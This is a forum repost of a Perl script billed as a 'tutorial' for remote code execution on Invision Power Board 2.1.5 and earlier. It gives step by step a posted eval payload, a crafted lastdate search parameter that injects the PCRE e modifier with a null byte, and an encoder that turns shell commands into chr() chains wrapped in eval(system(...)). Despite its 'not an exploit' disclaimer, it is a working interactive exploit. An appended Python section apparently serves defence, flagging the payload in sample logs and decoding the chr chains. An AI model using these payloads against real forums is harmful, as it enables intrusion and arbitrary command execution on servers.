
26.10.2008, 19:24
Invision Power Board <= 2.1.5 Remote Code Execution Tutorial
Author: +toxa+
Invision Power Board <= 2.1.5
Remote Code Execution
PHP code:
#!/usr/bin/perl
## Invision Power Board <= 2.1.5 Remote Code Execution Tutorial
## By not null
## Security Bunker Team
## http://secbun.info
## It is not an exploit! It is only tutorial, how to exploit a forum!
use strict;
use warnings;

print q(
#-----------------------------------------#
# Invision Power Board 2.x.x RCE Tutorial #
# By Security Bunker Team | ©not null #
# http://www.secbun.info #
#-----------------------------------------# );
print q(
Step 1: If you are already register on the forum, just login on it.
Else register first ;]);
print "\r\nPress enter when finished...\r\n";
my $ok = <STDIN>;
print q(
Ok, we have successful log in. Let's fun ;]
Step 2: Go to some of the forum, where you could post messages.
Step 3: Post a message, that consist our harmful code (muahaha)
The code is: "eval(phpinfo()); //" [without quotes]
);
print "\r\nPress enter when finished...\r\n";
$ok = <STDIN>;
print q(When message is post, open a new page in your browser and go to the Search
(index.php?act=search). Use the search form to find your post just by your username.
And make sure "Show results as posts" is selected.);
print "\r\nPress enter when finished...\r\n";
$ok = <STDIN>;
print q(You must see your post, that consist our code.
Then add to the end of the url next string:);
# The search script builds a regular expression from lastdate: ")#e" closes the
# pattern and appends the PCRE e modifier, the trailing %00 truncates the rest.
print "\r\n&lastdate=z|eval.*?%20//)%23e%00\r\n";
print q(and press enter...);
print "\r\nPress enter when finished...\r\n";
$ok = <STDIN>;
print q(Can you see a result of phpinfo? If yes, we have successful exploited forum :-]
So, let's modify our post to get a shell.
But on this step we have a problem: we can't use arguments in functions (e.g. system("ls")) in such form.
But we can use it by it's code (e.g. system(chr(34).chr(108).chr(115).chr(34)))
I'm include a simple tool, that will help you to encode you string into code.
Just type your command, and you will get a string, that you can copy and paste into your post);
print "\r\n";

# Encoder: rewrite every character of the command as chr(N), joined by ".",
# so the post needs no literal quote characters.
while (1) {
    print "\r\nCommand for encode or 'exit' for exit ";
    my $cmd = <STDIN>;
    last unless defined $cmd;      # stop on end of input instead of looping forever
    chomp($cmd);
    exit() if ($cmd eq 'exit');    # the original line had an unterminated quote here
    my $out = join('.', map { 'chr(' . ord($_) . ')' } split //, $cmd);
    print "eval(system(" . $out . ").chr(59).exit()); //";
}
PS: the material has been restored.
Publication date: 15.08.2007, 14:58
Author: +toxa+
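The two traces this tutorial leaves behind, the lastdate search request and the chr()-encoded post body, are what a defender reviewing an IPB 2.1.x install would look for. The Python below is an added example, not part of the original post or of the script above: it flags such requests in constructed sample access-log lines and decodes chr() chains in stored post text back to the command they hide. The log format, paths and timestamps are constructed assumptions.

```python
import re
from urllib.parse import parse_qs

# Constructed sample access-log lines (not from the page): the first carries the
# lastdate payload the tutorial describes, the other two are ordinary requests.
SAMPLE_LOG = """\
10.0.0.5 - - [15/Aug/2007:14:58:01 +0400] "GET /index.php?act=search&lastdate=z|eval.*?%20//)%23e%00 HTTP/1.1" 200 5120
10.0.0.7 - - [15/Aug/2007:14:59:10 +0400] "GET /index.php?act=search&lastdate=1187175000 HTTP/1.1" 200 3310
10.0.0.9 - - [15/Aug/2007:15:01:22 +0400] "GET /index.php?showtopic=12 HTTP/1.1" 200 9001
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (?P<url>\S+) HTTP/')
# Two or more chr(N) calls joined by "." (the shape the tutorial's encoder emits)
CHR_CHAIN_RE = re.compile(r'(?:chr\(\d+\)\s*\.\s*)+chr\(\d+\)')

def lastdate_indicators(url: str) -> list[str]:
    """Names of injection indicators found in the request's lastdate parameter."""
    if '?' not in url:
        return []
    query = parse_qs(url.split('?', 1)[1], keep_blank_values=True)
    hits = []
    for value in query.get('lastdate', []):
        # parse_qs percent-decodes, so %23 is '#' and %00 is a NUL byte here
        if '\x00' in value:
            hits.append('nul-byte')  # truncates whatever the script appends
        if re.search(r'\)\s*#\s*[a-zA-Z]*e', value):
            hits.append('pattern-close-with-e-modifier')  # ")#e" turns the regex into code
        if 'eval' in value or '.*?' in value:
            hits.append('regex-or-eval-fragment')
    return hits

def flag_log_lines(log_text: str) -> list[str]:
    """Return request URLs from an access log whose lastdate parameter looks injected."""
    flagged = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if m and lastdate_indicators(m.group('url')):
            flagged.append(m.group('url'))
    return flagged

def decode_chr_chains(post_body: str) -> list[str]:
    """Rebuild each string hidden as a chr(N).chr(N)... concatenation in stored post text."""
    return [''.join(chr(int(n)) for n in re.findall(r'chr\((\d+)\)', m.group(0)))
            for m in CHR_CHAIN_RE.finditer(post_body)]

if __name__ == '__main__':
    print(flag_log_lines(SAMPLE_LOG))
    print(decode_chr_chains('eval(system(chr(34).chr(108).chr(115).chr(34)).chr(59).exit()); //'))
```

Run the same two checks over a real access log and the posts table to find both the trigger request and the encoded payload it was meant to execute.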